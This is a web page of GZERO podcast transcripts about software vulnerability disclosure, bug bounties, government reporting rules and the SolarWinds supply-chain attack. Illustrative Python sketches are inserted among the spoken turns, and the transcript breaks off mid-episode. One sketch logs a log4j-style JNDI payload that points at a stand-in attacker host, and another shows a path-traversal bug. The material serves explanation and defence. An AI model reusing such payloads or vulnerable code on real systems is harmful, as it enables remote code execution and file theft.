Podcast: Can governments protect us from dangerous software bugs?
Listen: We've probably all felt the slight annoyance at prompts we receive to update our devices. But these updates deliver vital patches to our software, protecting us from bad actors. Governments around the world are increasingly interested in monitoring when dangerous bugs are discovered as a means to protect citizens. But would such regulation have the intended effect?
In season 2, episode 5 of Patching the System, we focus on the international system of bringing peace and security online. In this episode, we look at how software vulnerabilities are discovered and reported, what government regulators can and can't do, and the strength of a coordinated disclosure process, among other solutions.
Our participants are:
- Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro
- Serge Droz from the Forum of Incident Response and Security Teams (FIRST)
- Ali Wyne, Eurasia Group Senior Analyst (moderator)
GZERO’s special podcast series “Patching the System,” produced in partnership with Microsoft as part of the award-winning Global Stage series, highlights the work of the Cybersecurity Tech Accord, a public commitment from over 150 global technology companies dedicated to creating a safer cyber world for all of us.
Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.
TRANSCRIPT: Can governments protect us from dangerous software bugs?
Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.
DUSTIN CHILDS: The industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.
SERGE DROZ: I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable.
ALI WYNE: If you've ever gotten a notification pop up on your phone or computer saying that an update is urgently needed, you've probably felt that twinge of inconvenience at having to wait for a download or restart your device. But what you might not always think about is that these software updates can also deliver patches to your system, a process that is in fact where this podcast series gets its name.
Today, we'll talk about vulnerabilities that we all face in a world of increasing interconnectedness.
Welcome to Patching the System, a special podcast from the Global Stage Series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.
And about those vulnerabilities that I mentioned before, we're talking specifically about the vulnerabilities in the wide range of IT products that we use, which can be entry points for malicious actors. And governments around the world are increasingly interested in knowing about these software vulnerabilities when they're discovered.
Since 2021, for example, China has required that any time such software vulnerabilities are discovered, they first be reported to a government ministry, even before the company that makes the technology is alerted to the issue. In the European Union, similar but less stringent legislation is pending that would require companies that discover a software vulnerability has been exploited to report the information to government agencies within 24 hours, and to provide information on any mitigation used to correct the issue.
These policy trends have raised concerns from technology companies and incident responders that such policies could actually undermine security.
Joining us today to delve into these trends and explain why are Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm based in Japan, and Serge Droz from the Forum of Incident Response and Security Teams, aka FIRST, a community of IT security teams that respond when there's a major cyber crisis. Dustin, Serge, welcome to you both.
DUSTIN CHILDS: Hello. Thanks for having me.
SERGE DROZ: Hi. Thanks for having me.
ALI WYNE: It's great to be talking with both of you today. Dustin, let me kick off the conversation with you. And I tried in my introductory remarks to give listeners a quick glimpse as to what it is that we're talking about here, but give us some more detail. What exactly do we mean by vulnerabilities in this context and where did they originate?
DUSTIN CHILDS: Well, vulnerability, really when you break it down, it's a flaw in software that could allow a threat actor to potentially compromise a target, and that's a fancy way of saying it's a bug. They originate in humans because humans are imperfect and they make imperfect code, so there's no software in the world that is completely bug free, at least none that we've been able to generate so far. So every product, every program given enough time and resources can be compromised because they all have bugs, they all have vulnerabilities in them. Now, vulnerability doesn't necessarily mean that it can be exploited, but a vulnerability is something within a piece of software that potentially can be exploited by a threat actor, a bad guy.
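To make that definition concrete, here is a minimal, hypothetical sketch in Python of one classic bug class, a path traversal flaw. The directory, function names, and fix are invented for illustration, not drawn from any product discussed here:

```python
import os

BASE_DIR = "/srv/app/reports"

def read_report(filename: str) -> str:
    # BUG: a user-supplied filename is joined without validation, so a
    # request like "../../../etc/passwd" escapes BASE_DIR (path traversal).
    path = os.path.join(BASE_DIR, filename)
    with open(path) as f:
        return f.read()

def read_report_fixed(filename: str) -> str:
    # Fix: resolve the final path and confirm it stays inside BASE_DIR.
    path = os.path.realpath(os.path.join(BASE_DIR, filename))
    if not path.startswith(BASE_DIR + os.sep):
        raise ValueError("path escapes the report directory")
    with open(path) as f:
        return f.read()
```

The vulnerable version runs perfectly well on normal input; the flaw only matters once an attacker supplies a hostile filename, which is the gap Dustin describes between a vulnerability existing and it being exploited.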
ALI WYNE: And Serge, when we're talking about the stakes here, obviously vulnerabilities can create cracks in the foundation that lead to cybersecurity incidents or attacks. What does it take for a software vulnerability to become weaponized?
SERGE DROZ: Well, that really depends on the particular vulnerability. A couple of years ago, there was a vulnerability that was really super easy to exploit: log4j. It was something that everybody could do in an afternoon, and that of course is a really big risk. If something like that gets public before it's fixed, we really have a big problem. Other vulnerabilities are much harder to exploit, partly because software vendors, in particular operating system vendors, have invested a great deal in countermeasures that make exploitation hard on their systems. The easy ones are getting rarer as a result. The harder ones need specialists, and that's why they fetch such a high price. So there is no general answer, but the trend is that it's getting harder, which is a good thing.
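As a hedged illustration of why log4j was so easy to exploit: the library expanded `${...}` lookup expressions even when they appeared inside attacker-supplied text. This toy Python imitation shows only the anti-pattern; it is not the actual log4j code:

```python
import re

def log_message(message: str) -> None:
    # Anti-pattern: expand "${...}" lookups anywhere in the logged string,
    # including fragments that came straight from an attacker. log4j's
    # "${jndi:ldap://...}" lookups went further and fetched remote code.
    expanded = re.sub(r"\$\{([^}]*)\}",
                      lambda m: f"<resolved:{m.group(1)}>",
                      message)
    print(expanded)

# Anything a user sends ends up interpreted, not merely recorded:
log_message("User-Agent: ${jndi:ldap://attacker.example/a}")
```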
ALI WYNE: And Dustin, let me come back to you then. So who might discover these vulnerabilities first and what kinds of phenomena make them more likely to become a major security risk? And give us a sense of the timeline between when a vulnerability is discovered and when a so-called bad actor can actually start exploiting it in a serious way.
DUSTIN CHILDS: The people who are discovering these are across the board. They're everyone from lone researchers just looking at things to nation states, really reverse engineering programs for their own purposes. So a lot of different people are looking at bugs, and it could be you just stumble across it too and it's like, "Oh, hey. Look, it's a bug. I should report this."
So there's a lot of different people who are finding bugs. Not all of them are monetizing their research. Some people just report it. Some people will find a bug and want to get paid in one way or another, and that's what I do, is I help them with that.
But then once it gets reported, depending on what industry you're in, it's usually 120 days up to a year until it gets fixed by the vendor. But if a threat actor finds it and it can be weaponized, they can do that within 48 hours. So even if a patch is available and that patch is well-known, the bad guys can take that patch, reverse engineer it, and turn it into an exploit within 48 hours and start spreading. So within 30 days of a patch being made available, widespread exploitation is not uncommon if a bug can be exploited.
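A hedged sketch of the "reverse engineer the patch" step Dustin describes, often called patch diffing. Real attackers diff binaries with specialized tools; this Python sketch just diffs two versions of a source file to show the idea, and the file names are hypothetical:

```python
import difflib
from pathlib import Path

def patch_diff(old_path: str, new_path: str) -> list[str]:
    # Whatever changed between the vulnerable and patched versions points
    # almost directly at the bug the vendor just fixed.
    old = Path(old_path).read_text().splitlines()
    new = Path(new_path).read_text().splitlines()
    return [
        line
        for line in difflib.unified_diff(old, new, lineterm="")
        if line.startswith(("+", "-")) and not line.startswith(("+++", "---"))
    ]

# Hypothetical usage:
# for line in patch_diff("parser_v1.c", "parser_v1_patched.c"):
#     print(line)
```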
ALI WYNE: Wow. So 48 hours, that doesn't give folks much time to respond, but thank you, Dustin, for giving us that number. I think we now have at least some sense of the problem, the scale of the problem, and we'll talk about prevention and solutions in a bit. But first, Serge, I want to come back to you. I want to go into some more detail about the reporting process. What are the best practices in terms of reporting these vulnerabilities that we've been discussing today? I mean, suppose if I were to discover a software vulnerability for example, what should I do?
SERGE DROZ: This is a really good question, and there's still a lot of ongoing debate, even though the principles are actually quite clear. If you find a vulnerability, your first step should be to actually start informing confidentially the vendor, whoever is responsible for the software product.
But that actually sounds easier than it is, because quite often it's hard to talk to a vendor. There are still some companies out there that don't talk to ‘hackers,’ in inverted commas. That's really bad practice. In this case, I recommend that you contact a national agency that you trust that can mediate between you. And that's all fairly easy if it's just between you and one other party, but there are also a lot of vulnerabilities in products for which no one is really responsible; take open source, or components that are used in many other products.
So we're talking about supply chain issues, and then things really become messy. In these cases, I really recommend that people start working together with someone who's experienced in doing coordinated vulnerability disclosure. Quite often what happens is that the affected organizations within the industry get together and form a working group that silently starts mitigating the issue. Best practice is that you give the vendor three months or more to actually be able to fix a bug, because sometimes it's not that easy. What you really should not be doing is leaking any kind of information. Even saying, "Hey, I have found a vulnerability in product X," may trigger someone to start looking at it. So it is really important that this remains a confidential process in which very few people are involved.
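The confidential window Serge describes is usually tracked as an embargo deadline. A minimal sketch of that bookkeeping, assuming a 90-day default; the dates and the default are illustrative, not any program's actual policy:

```python
from datetime import date, timedelta

def embargo_end(reported_on: date, embargo_days: int = 90) -> date:
    # The vendor gets a fixed confidential window to ship a fix; Serge
    # suggests three months or more, since some bugs are hard to fix.
    return reported_on + timedelta(days=embargo_days)

report_date = date(2024, 1, 15)   # hypothetical report date
print(embargo_end(report_date))   # 2024-04-14
```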
ALI WYNE: So one popular method of uncovering these vulnerabilities that we've been discussing involves so-called bug bounty programs. What are bug bounty programs? Are they a good tool for catching and reporting these vulnerabilities? And moving beyond bug bounty programs, are there other tools that work when it comes to reporting vulnerabilities?
SERGE DROZ: Bug bounty programs are just one of the tools we have in our tool chest to actually find vulnerabilities. The idea behind a bounty program is that you have a lot of researchers who poke at code just because they're interested, and as the company or producer of the software, you offer them a bounty: if they report a vulnerability responsibly, you pay them, usually depending on how severe or dangerous the vulnerability is, and encourage good behavior this way. I think it's a really great approach because it creates a lot of diversity. Bug bounty programs typically attract many different types of researchers, so you get different ways of looking at your code, and that often uncovers vulnerabilities that no one has ever thought of, because no one had that way of thinking. So I think it's a really good thing.
It also rewards people who responsibly disclose and don't just sell to the highest bidder, because we do have companies out there that buy vulnerabilities that then end up in some strange gray market, exactly what we don't want. Bug bounty programs are complementary to what we call penetration testing, where you hire a company that, for a fee, looks at your software. There's no guarantee that they find a bug, but they usually go over it systematically, and you have an agreement. As I said, I don't think there's a single silver bullet, a single way to do this, but I think bounties are a great way to reward responsible disclosure. And some bug bounty researchers make a lot of money; they actually make a living off it. If you're really good, you can make a decent amount of money.
DUSTIN CHILDS: Yeah, and let me just add on to that as someone who runs a bug bounty program. There are a couple of different types of bug bounty programs too, and the most common one is the vendor specific one. So Microsoft buys Microsoft bugs, Apple buys Apple bugs, Google buys Google bugs. Then there's the ones that are like us. We're vendor-agnostic. We buy Microsoft and Apple and Google and Dell and everything else pretty much in between.
And one of the biggest things that we do as a vendor-agnostic program is an individual researcher might not have a lot of sway when they contact a big vendor like a Microsoft or a Google, but if they come through a program like ours or other vendor-agnostic programs out there, they know that they have the weight of the Zero Day Initiative or that program behind it, so when the vendor receives that report, they know it's already been vetted by a program and it's already been looked at. So it's a little bit like giving them a big brother that they can take to the schoolyard and say, "Show me where the software hurt you," and then we can help step in for that.
ALI WYNE: And Dustin, you've told us what bug bounty programs are. Why would someone want to participate in that program?
DUSTIN CHILDS: Well, researchers have a lot of different motivations, whether it's curiosity or just trying to get stuff fixed, but it turns out money is a very big motivator pretty much across the spectrum. We all have bills to pay, and a bug bounty program is a way to get something fixed and potentially earn a large amount of money, depending on the type of bug that you have. The bugs I deal with range anywhere from $150 on the very low end up to $15 million for the most severe zero-click iPhone exploits purchased by governments, with all points in between. So it's potentially lucrative if you find the right types of bugs, and we do have people who are exclusively bug hunters throughout the year, and they make a pretty good living at it.
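Programs like the ones Dustin and Serge describe typically tier payouts by severity, often keyed to CVSS scores. A minimal sketch, with payout figures that are invented rather than taken from any real program's table:

```python
def bounty_for(cvss_score: float) -> int:
    # Hypothetical payout bands keyed to CVSS v3 severity ranges.
    bands = [
        (9.0, 50_000),  # critical
        (7.0, 10_000),  # high
        (4.0, 2_000),   # medium
        (0.1, 150),     # low
    ]
    for threshold, payout in bands:
        if cvss_score >= threshold:
            return payout
    return 0

print(bounty_for(9.8))  # 50000
print(bounty_for(5.3))  # 2000
```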
ALI WYNE: Duly noted. So maybe I'm playing a little bit of devil's advocate here, but if these cyber vulnerabilities usually arise from errors in code or other technology mistakes by companies, aren't they principally a matter of industry responsibility? And wouldn't the best prevention just be to regulate software development more tightly and prevent these mistakes from getting out into the world in the first place?
DUSTIN CHILDS: Oh, you used the R word. Regulation, that's a big word in this industry. So obviously it's less expensive to fix bugs in software before it ships than after, so yes, it's better to fix these bugs before they reach the public. However, that's not really realistic, because like I said, every piece of software has bugs, and you could spend a lifetime testing and testing and never root them all out, and then never ship a product. So the industry right now is definitely looking to ship product. Can they do a better job? I certainly think they can. I spend a lot of money buying bugs, and with some of them I'm like, "Ooh, that's a silly bug that should never have shipped." So absolutely, the industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.
ALI WYNE: Obviously there isn't any silver bullet when it comes to managing these vulnerabilities, disclosing these vulnerabilities. So assuming that we probably can't eliminate all of them, how should organizations deal with fixing these issues when they're discovered? And is there some kind of coordinated vulnerability disclosure process that organizations should follow?
DUSTIN CHILDS: There is a coordinated disclosure process. I mean, I've been in this industry for 25 years and have dealt with vulnerability disclosures personally since 2008, so this is a well-known process. As an industry, if you're developing software, one of the most important things you can do is make sure you have a contact point: if someone finds a bug in your program, who do they email? With the more established programs like Microsoft and Apple and Google, it's very clear who you're supposed to email if you find a bug and what you're supposed to do. One of the problems we have as a bug bounty program is that if we purchase a bug in a lesser-known piece of software, sometimes it's hard for us to hunt down who is actually responsible for maintaining and updating it.
We've even had to go on Twitter and LinkedIn to try to hunt down people to respond to an email saying, "Hey, we've got a bug in your program." So one of the biggest things you can do is simply be prepared for somebody to report a bug to you. As a consumer of the product, however, you need a patch management program. You can't just rely on automatic updates or on things happening automatically or easily. You need to understand first what is in your environment, so you have to be ruthless in your asset discovery, and I use the word ruthless intentionally. You've got to know what is in your enterprise to be able to defend it, and then you've got to have a plan for managing and patching it. That's a lot easier said than done, especially in a modern enterprise where you don't just have desktops and laptops: you've got IT devices, you've got IoT devices, you've got thermostats, you've got little screens everywhere that need updating, and they all have to be included in that patch management process.
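The patch management loop Dustin describes reduces to two lists: what you run, and what is known vulnerable. A minimal sketch, with invented inventory, product names, and advisory entries:

```python
# Invented data: what is running in the enterprise, and what is known bad.
inventory = {
    "lobby-thermostat": {"product": "acme-thermostat", "version": "2.1"},
    "hr-laptop-17": {"product": "acme-agent", "version": "5.0"},
}
advisories = {
    ("acme-thermostat", "2.1"): "ACME-2024-0001: update to 2.2",
}

for host, sw in inventory.items():
    advisory = advisories.get((sw["product"], sw["version"]))
    if advisory:
        print(f"{host}: {advisory}")
```

The hard part in practice is the first dictionary: the "ruthless asset discovery" that keeps the inventory complete.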
ALI WYNE: Serge, when it comes to triaging vulnerabilities, it doesn't sound like there's a large need for government participation. So what are some of the reasons, legitimate and maybe less than legitimate, why governments might increasingly want to be notified about vulnerabilities even before patches are available? What are their motivations?
SERGE DROZ: So I think there are several different motivations. Governments are getting increasingly fed up with the kinds of excuses that our industry, the software industry, makes about how hard it is to avoid software vulnerabilities, all the reasons and excuses we bring for not doing our jobs. And frankly, as Dustin said, we could be doing better. Governments want to know so they can send the message, "Hey, we're watching you, and we want to make sure you do your job." Personally, I'm not really convinced this is going to work. Those would be the mostly legitimate reasons why governments want to know about vulnerabilities. I think it's fair that a government learns about a vulnerability after the fact, just to get an idea of what the risk is for the entire industry. Personally, I feel only the parties that need to know should know during the responsible disclosure.
And then of course, there are governments that like vulnerabilities because they can abuse them themselves. I mean, governments are known to exploit vulnerabilities through their favorite three-letter agencies. That's actually quite legitimate for governments to do; it's not illegal for governments to do this type of work. But of course, as a consumer or an end user, I don't like it. I don't want products with vulnerabilities that are being exploited. And from a civil society point of view, there's just too much risk with this being out there. So my advice really is: the fewer people and organizations that know about a vulnerability, the better.
DUSTIN CHILDS: What we've been talking about a lot so far is what we call coordinated disclosure, where the researcher and the vendor coordinate a response. When you start talking about governments though, you start talking about non-disclosure, and that's when people hold onto these bugs and don't report them to the vendor at all, and the reason they do that is so that they can use them exclusively. So that is one reason why governments hold onto these bugs and want to be notified is so that they have a chance to use them against their adversaries or against their own population before anyone else can use them or even before it gets fixed.
ALI WYNE: So the Cybersecurity Tech Accord recently released a statement opposing the kinds of reporting requirements we've been discussing. From an industry perspective, what are the concerns when it comes to reporting vulnerabilities to governments?
DUSTIN CHILDS: Really, the biggest concern is making sure that we all have an equitable chance to get it fixed before it gets used. If a single government starts using vulnerabilities to exploit for its own gain, that puts the rest of the world at a disadvantage, and that's the rest of the world, allies as well as opponents. So we want to do coordinated disclosure. We want to get the bugs fixed in a timely manner, and governments keeping bugs to themselves really discourages that. It discourages finding bugs, it discourages reporting bugs, and it really discourages vendors from fixing bugs too, because if the vendors know that governments are just going to be using these bugs, they might get a phone call from their friendly neighborhood three-letter agency saying, "You know what? Hold off on fixing that for a while." Again, it just puts us all at risk, and we saw this with Stuxnet.
Stuxnet was a tool developed by governments targeting another government. It targeted Iranian nuclear facilities, and it did do damage to them, but it also did a lot of collateral damage throughout Europe, and that's what we're trying to avoid. If it's a government-on-government thing, great, that's what governments do, but we're trying to minimize the collateral damage to everyone else, and there really were a lot of other places that were negatively impacted by the Stuxnet virus.
ALI WYNE: And Serge, what would you say to someone who might respond to the concerns that Dustin has raised by saying, "Well, my government is advanced and capable enough to handle information about vulnerabilities responsibly and securely, so there's no issue or added risk in reporting to them." What would you say to that individual?
SERGE DROZ: The point is that there are certain things you really only deal with on a need-to-know basis. That's something governments actually understand: when they deal with confidential or critical information, it's always need-to-know. They don't tell every government employee, even though those employees are, of course, loyal. Sharing more widely makes the risk of a leak bigger, even if the government doesn't have any ill intent. So there's just no need, the same way there is no need for the other hundred thousand security researchers to know about it. As long as you cannot contribute constructively to mitigating a vulnerability, you should not be part of that process.
Having said that, though, there are some governments that have really tried hard to help researchers make contact with vendors. Some researchers are afraid to report vulnerabilities because they feel they're going to come under pressure or something like that. So if a government wants to take that role and can create enough trust that researchers trust it, I don't really have a problem with that, but it should not be mandatory. Trust needs to be earned. You cannot legislate it, and every time you have to legislate something, I mean, come on, you legislate it because people don't trust you.
ALI WYNE: We've spent some time talking about vulnerabilities and why they're a problem, and we've discussed some effective and maybe some not-so-effective ways to prevent or manage them better. I think governments have a legitimate interest in knowing that companies are acting responsibly, and that interest is the impetus behind at least some of the push for more regulation and reporting. But what does each of you see as other ways that governments could help ensure that companies are mitigating risks and protecting consumers as much as possible?
DUSTIN CHILDS: So one of the things that we're involved with here at the Zero Day Initiative is encouraging governments to allow safe harbor. What that means is that researchers can report vulnerabilities to a vendor without the legal threat of being sued or having other action taken against them. As long as they are legitimately reporting a bug, not trying to steal anything or violate laws, they're able to do that without facing legal consequences.
One of the biggest things that we do as a bug bounty program is handle the communications between researchers and vendors, and that is really where things can get very contentious. So to me, one of the things governments can do to help is make sure that safe harbor is allowed, so that researchers know, "I can report this vulnerability to this vendor without getting in touch with a lawyer first." Maybe they're trying to get paid as well, so there may be some monetary value in it, but really they're just trying to get something fixed. They're not trying to extort anyone or create havoc. That safe harbor would be very valuable for them. It's one thing we're working on with our government contacts, and I think it's a very big thing for the industry to embrace as well.
SERGE DROZ: Yes, I concur with Dustin. I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and desirable. That also includes a regulatory framework that gets away from blaming. I mean, writing software is hard; bugs appear. If you constantly keep bashing people for not doing it right, or you threaten them with liabilities, they're not going to talk to you about these types of things. So I think the job of the government is to encourage responsible behavior and to create an environment for it. There are always going to be a couple of black sheep, and maybe the role of the government there is to encourage them to play along and start offering vulnerability reporting programs. That's where I see the role of the government: creating good governance to enable responsible vulnerability disclosure.
ALI WYNE: Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm based in Japan, and Serge Droz from the Forum of Incident Response and Security Teams, a community of IT security teams that respond when there is a major cyber crisis. Dustin, Serge, thanks very much for joining me today.
DUSTIN CHILDS: You're very welcome. Thank you for having me.
SERGE DROZ: Yes, same here. It was a pleasure.
ALI WYNE: That's it for this episode of Patching the System. We have five episodes this season covering everything from cyber mercenaries to a cybercrime treaty, so follow Ian Bremmer's GZERO World feed anywhere you get your podcasts to hear more. I'm Ali Wyne. Thanks very much for listening.
Attacked by ransomware: The hospital network brought to a standstill by cybercriminals
In October 2022, the second-largest nonprofit healthcare system in the US, CommonSpirit Health, was hit with a crippling ransomware attack. Kelsay Irby works as an ER nurse at a CommonSpirit hospital in Washington. She arrived at work to chaos after the malware had spread through the hospital network: systems were down, computers were running slowly or not at all, labs weren’t returning results, and nurses were charting vitals with pen and paper. Even basic things like knowing what medications patients were on or why they came into the emergency room were a challenge, putting lives at risk. The hospital’s nurses and doctors scrambled to manage the crisis for over two weeks until CommonSpirit Health was able to restore access to the IT network.
“It was just kind of this perfect storm of very sick patients, not enough help, everybody was super frustrated,” Irby says. “My biggest fear during the whole cyberattack was that a patient was going to suffer because we couldn’t access the technology.”
GZERO spoke with Irby about her experience during the ransomware attack, as well as cybersecurity expert Mora Durante Astrada from Zurich Insurance Group for the final episode of “Caught in the Digital Crosshairs: The Human Impact of Cyberattacks,” a new video series on cybersecurity produced by GZERO in partnership with Microsoft and the CyberPeace Institute. Astrada volunteers for the Institute and its CyberPeace Builders Program, which provides free cybersecurity assistance, threat detection, and analysis to NGOs and other critical sectors while advocating for safety and security in cyberspace.
Podcast: Lessons of the SolarWinds attack
Listen: Two years after the discovery of one of the largest cyber attacks in history, we’re looking at the current state of security for both software and hardware supply chains.
In early 2020, a group of hackers broke into a software system built and managed by the Texas-based company SolarWinds. The malware they installed was eventually downloaded by thousands of SolarWinds customers, including both private companies and government agencies like the US State Department. SolarWinds has since said the number of clients actually hacked was far lower.
What lessons were learned, and how vulnerable are information and communication technology supply chains today?
In the third episode of Patching the System, a GZERO podcast produced as part of the Global Stage partnership with Microsoft, we’re examining that question with two top experts in the field.
Our participants are:
- Gaus Rajnovic, cybersecurity manager at Panasonic Europe
- Charles Carmakal, senior vice president and chief technology officer at Mandiant
- Ali Wyne, Eurasia Group Senior Analyst (moderator)
TRANSCRIPT: Lessons of the SolarWinds attack
Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.
Gaus Rajnovic: Scope and coverage, that is why those supply chain attacks are so dangerous. They spread easily and relatively quickly.
Charles Carmakal: As an average person though, it is impossible for us to really consider all the variety of cybersecurity attacks that are out there. And in general, the right practice is to have some level of trust of the vendors of the software that you use.
Ali Wyne: Welcome to Patching the System, a special podcast from the Global Stage series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.
Today we're talking about a cyber attack so massive it became a household name: SolarWinds. In early 2020, a group of hackers broke into a software system called Orion, which was built and managed by the Texas-based company SolarWinds. They installed malicious code, and later that spring it was unwittingly delivered to customers in routine software updates. In total, more than 18,000 clients were affected, including large private companies as well as government agencies such as the State Department and the Department of Homeland Security.
Now the SolarWinds hack is an example of what we call a supply chain attack on information and communication technology, or ICT for short. We're going to talk about what those kinds of attacks are and why they pose a serious and unique threat in the world of cyber attacks.
Joining us now are two industry representatives who work on different sides of this issue. First, Charles Carmakal, senior vice president and chief technology officer at Mandiant, a security research firm working to discover and thwart bad actors who target technology products and services. Charles, it's great to have you here.
Charles Carmakal: Thanks a lot. It's great to be here.
Ali Wyne: We're also joined by Gaus Rajnovic. He serves as a cybersecurity manager at Panasonic Europe, which makes a wide range of technology products, many of which listeners may be familiar with. Gaus, welcome.
Gaus Rajnovic: Hello.
Ali Wyne: Let's dive in first by providing some additional context around the hacking attack that I mentioned, SolarWinds. Charles, you are from Mandiant, which obviously has a relationship to this attack, so why don't you explain to us from your perspective: first, how bad was this attack? Second, how was it discovered? And third, what was the fallout?
Charles Carmakal: Yeah, absolutely. So I was very close to the event. It really changed my world, and I remember it very vividly. Back in December 2020, I worked for FireEye, and that was the organization that ended up detecting and discovering the SolarWinds attack. An employee had registered a second mobile device into our multifactor authentication solution, and one of our security analysts picked that up and noticed that the enrollment of the secondary device seemed a little bit suspicious. And so he actually reached out to the employee to figure out whether or not he had actually enrolled a second mobile device, and he said he didn't.
And that actually kicked off what ended up being probably one of the most notable cybersecurity events in history. And so as the days progressed and as we conducted an investigation to really try to understand how did somebody get access to the credentials of this employee to be able to enroll a second mobile device into our multifactor authentication solution, we started finding evidence of attacker activity.
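The control that caught the intrusion is simple to sketch: treat any new MFA device enrollment as an event to confirm with the user. A toy Python version of that logic, with invented users and device IDs:

```python
enrolled = {"jsmith": {"iphone-a1b2"}}  # known MFA devices per user (invented)

def on_enrollment(user: str, device_id: str) -> None:
    devices = enrolled.setdefault(user, set())
    if devices and device_id not in devices:
        # A second, unfamiliar device: have an analyst confirm with the
        # user before trusting it, which is exactly the check that worked.
        print(f"ALERT: confirm with {user} that they enrolled {device_id}")
    devices.add(device_id)

on_enrollment("jsmith", "android-z9y8")  # triggers the alert
```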
As part of any investigation, you've got to figure out how the attackers actually got access to the environment. And as we were digging and digging, the earliest evidence of attacker activity that we saw occurred on the SolarWinds Orion systems that we used at FireEye, but we couldn't tell exactly how the threat actor got access to those systems. There were a number of hypotheses that we tested, and one of them was whether there was a potential supply chain attack, essentially meaning: was it possible that malicious code was actually sent to our computers through SolarWinds, through a legitimate code delivery process? And what we ended up doing to figure out whether this was the case was reverse engineering the SolarWinds Orion software. We essentially reverse engineered tens of thousands of lines of code.
And ultimately, we identified a few thousand lines of code that were heavily obfuscated and looked very suspicious, if not malicious, in nature. And the thing we noticed was that the code was digitally signed by the vendor. So although it looked suspicious, arguably malicious, we knew it came from SolarWinds because it was digitally signed, unless the signatures or the signing keys had been stolen from SolarWinds. And so as part of the process, we called SolarWinds and let them know what our findings were. We got back on the phone with them a few hours later, and what they confirmed to us was that they didn't see any malicious code in the code repositories for the SolarWinds Orion product.
But what they told us is that after the product was built, they saw these unauthorized routines added to the finished product. And at that point in time, we knew there was a supply chain attack, and we knew that the legitimate software downloaded by thousands of organizations contained a malicious component, what we call SUNBURST, which would've allowed a Russian adversary to get access to computer systems running the software.
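One lesson of SUNBURST is that a valid signature proves who built a package, not that the build was clean. Verifying downloads is still a sensible baseline; here is a minimal hash-check sketch in Python, where the expected digest is a placeholder a vendor would publish out of band:

```python
import hashlib

# Placeholder: a digest the vendor would publish out of band.
EXPECTED_SHA256 = "0" * 64

def verify_update(path: str) -> bool:
    # Baseline integrity check before installing an update. SUNBURST
    # showed its limits: the implant was inserted before signing, so the
    # vendor's own signature and hashes matched the malicious build.
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return digest == EXPECTED_SHA256
```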
The important thing to note is, this was arguably one of the most expensive cyber weapons that had been developed by a government. And because it was so expensive, the threat actor behind it was very specific in choosing which organizations they were going to leverage this backdoor and this capability to conduct further intrusion activity on. And we suspect that there were less than a hundred organizations that they chose to leverage this capability with.
But those hundred-some-odd organizations are arguably some of the most high-profile, hardest-to-hack organizations out there, from both a commercial and a government perspective. The impact was pretty significant in the sense that this enabled the Russian government to get access to data of strategic interest to it. They were very interested in data that governments had, and in commercial entities that either had access to that same data or could facilitate access to the systems or networks of government entities holding information of strategic interest to the Russian government.
Ali Wyne: Wow. I mean, it almost felt like I was listening to a new Netflix drama about the SolarWinds attack. Now, granted, this particular hack took place in 2020, but the narrative that you just related to us obviously couldn't be more timely in light of Russia's invasion of Ukraine. Gaus, I want to come to you. Can you give us a basic understanding of what we mean by the phrase supply chain attacks? And why are they dangerous?
Gaus Rajnovic: Absolutely. Let me just say, I work for a vendor, so part of my answer is basically describing how those attacks influence us vendors, the people who are producing something, but at the same time how they also affect users of technology.
So coming to your question: scope and coverage, that is what makes them dangerous. They spread easily and relatively quickly. I was always puzzled about why we didn't see them a little bit earlier, because from my vendor's side, you could see that potential some time ago.
Gaus Rajnovic: To explain why I'm saying that, let me give an example of how products are made. When you want to create a new product, you take ready-made components, you put everything in one pile, and then you add a little bit of magic, something that is unique to your product so that you can be different from the others. Apart from a relatively small number of vendors, most vendors are using already-made components. So there is widespread reuse, and that is why those supply chain attacks spread through our industry and why they are so dangerous.
Ali Wyne: Charles, I want to come back to you in light of the explanation that Gaus just provided, talking about not only software but hardware. When we hear the phrase supply chains, we often think about physical components. Imagine, for example, car parts that are made in one country and put into cars in another country. But in the case of SolarWinds, we're talking about the targeting of software, not hardware; it's less about a bunch of items stored in a warehouse somewhere. Can you explain a little bit more about what is in a software supply chain? And maybe, in addition, help us understand the various points along that chain that could potentially be targeted?
Charles Carmakal: Yeah, yeah. So look, I think there is general confusion as to what a supply chain attack is, and if you had asked somebody what a supply chain attack was back in the summer of 2020, they'd have given you a very different definition than what they would've told you in January of 2021. Many of our definitions changed in December 2020, when we heard about the SolarWinds attack.
Ali Wyne: Sure.
Charles Carmakal: And that's kind of because of the ubiquity of SolarWinds and because of how prevalent the attack was. So what happened with SolarWinds is a threat actor found a way to insert malicious code into a legitimate product that ended up getting shipped out to a variety of customers across the globe.
And that software was authenticated by SolarWinds, and it was part of a legitimate software update process that SolarWinds had established to allow people to get updated versions of their software. And when they say 18,000-some-odd organizations could have potentially been impacted by SUNBURST or by this attack, that's really the estimated count of organizations that had legitimately downloaded the software update.
Another way to look at a supply chain attack is, can a threat actor break into one company, perhaps a service provider, and leverage that access to that one service provider and get access to dozens or hundreds or thousands of other organizations because of the legitimate connectivity between that service provider and their thousands, some odd customers?
And we see attacks like this all the time.
Ali Wyne: Gaus, Panasonic is a company that obviously makes a lot of consumer devices. So are there similar cyber vulnerabilities in the hardware supply chain? How can hardware supply chains be targeted?
